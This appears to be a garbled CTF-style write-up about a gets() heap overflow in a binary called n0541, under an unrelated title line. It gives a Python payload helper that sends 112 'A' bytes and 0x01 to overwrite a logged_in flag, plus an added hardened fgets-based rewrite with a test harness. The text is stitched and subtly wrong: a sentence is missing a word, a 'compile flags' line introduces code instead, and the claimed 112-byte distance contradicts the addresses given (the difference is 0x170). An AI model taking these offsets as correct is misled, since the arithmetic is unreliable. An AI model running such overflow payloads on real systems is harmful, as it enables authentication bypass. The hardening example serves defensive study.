Tokyohot N0541

The password buffer is only 0x80 (128) bytes, so we have of headroom before we start overwriting logged_in.

The interesting functions are register_user, login, and show_secret.

    #include <stdio.h>
    #include <stdlib.h>

    void register_user()
    {
        char *name = malloc(0x80);
        char *pwd = malloc(0x80);
        printf("Name: ");
        gets(name);            // <--- vulnerable: no length limit on the input line
        printf("Password: ");
        gets(pwd);             // same problem for the password buffer
        // store pointers in a global struct (userlist)
    }

    $ ./n0541
    1) Register
    > 1
    Name: AAAAA...
    Password: BBBBB...
    [debug] pwd ptr = 0x603090

The global logged_in lives at 0x603200. The distance is 0x603200 - 0x603090 = 0x70 (112) bytes.

    def login_overwrite(s):
        menu(s)                         # helper from the write-up, not shown here: consume the menu
        s.sendall(b'2\n')               # pick option 2 (login)
        recvuntil(s, b'Password: ')     # helper from the write-up, not shown here
        # 112 filler + 0x01 + newline
        payload = b'A' * 112 + b'\x01' + b'\n'
        s.sendall(payload)

Compile with the original flags:

    void register_user(void)
    {
        char *name = malloc(0x80);
        char *pwd = malloc(0x80);
        if (!name || !pwd)     // allocation check; the condition is cut off in the source
            return;
        printf("Name: ");
        gets(name);            // still unbounded
        printf("Password: ");
        gets(pwd);
    }
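As an added, defender-side example (not code from the write-up or the challenge binary), here is a hardened register_user that keeps the same 0x80 heap allocations but replaces gets with a bounded fgets-based reader that drains over-long lines instead of writing them past the buffer; the FILE* parameter, the struct user type, the tmpfile helper and the sample over-long input are my assumptions so it can be exercised offline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD_SIZE 0x80          /* same 128-byte heap buffers as the original */

static int logged_in = 0;        /* the global the overflow was aimed at */

struct user { char *name; char *pwd; };   /* assumed shape of a userlist entry */

/* Read one line into buf (at most size-1 chars), drop the trailing newline
 * and discard the rest of an over-long line so the excess is never written
 * anywhere. Returns 1 if the input had to be truncated, else 0. */
int read_field(char *buf, size_t size, FILE *in) {
    int truncated = 0, c;
    if (fgets(buf, (int)size, in) == NULL) { buf[0] = '\0'; return 0; }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
    } else {
        /* no newline seen: the line was longer than the buffer, drain it */
        while ((c = fgetc(in)) != EOF && c != '\n') truncated = 1;
    }
    return truncated;
}

/* Hardened register_user: identical allocations, bounded reads, NULL check.
 * Takes a FILE* instead of reading stdin so it can be exercised offline. */
struct user register_user_safe(FILE *in) {
    struct user u = { malloc(FIELD_SIZE), malloc(FIELD_SIZE) };
    if (!u.name || !u.pwd) { free(u.name); free(u.pwd); u.name = u.pwd = NULL; return u; }
    printf("Name: ");     read_field(u.name, FIELD_SIZE, in);
    printf("Password: "); read_field(u.pwd, FIELD_SIZE, in);
    return u;
}

/* Constructed stand-in for the user's terminal: a tmpfile holding s. */
FILE *constructed_input(const char *s) {
    FILE *f = tmpfile();
    if (f) { fputs(s, f); rewind(f); }
    return f;
}

/* Feed a 200-byte name (longer than 0x80) and a normal password; returns 1 if
 * the name was clipped to FIELD_SIZE-1, the password arrived intact and
 * logged_in was never touched. */
int demo_overlong_registration(void) {
    char line[300];
    memset(line, 'A', 200); memcpy(line + 200, "\nhunter2\n", 10);
    FILE *in = constructed_input(line);
    if (!in) return 0;
    struct user u = register_user_safe(in);
    int ok = u.name && strlen(u.name) == FIELD_SIZE - 1
             && strcmp(u.pwd, "hunter2") == 0 && logged_in == 0;
    fclose(in); free(u.name); free(u.pwd);
    return ok;
}

int main(void) { return demo_overlong_registration() ? 0 : 1; }
```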

    heap:
      0x603010 -> name buffer (0x80)
      0x603090 -> pwd buffer  (0x80)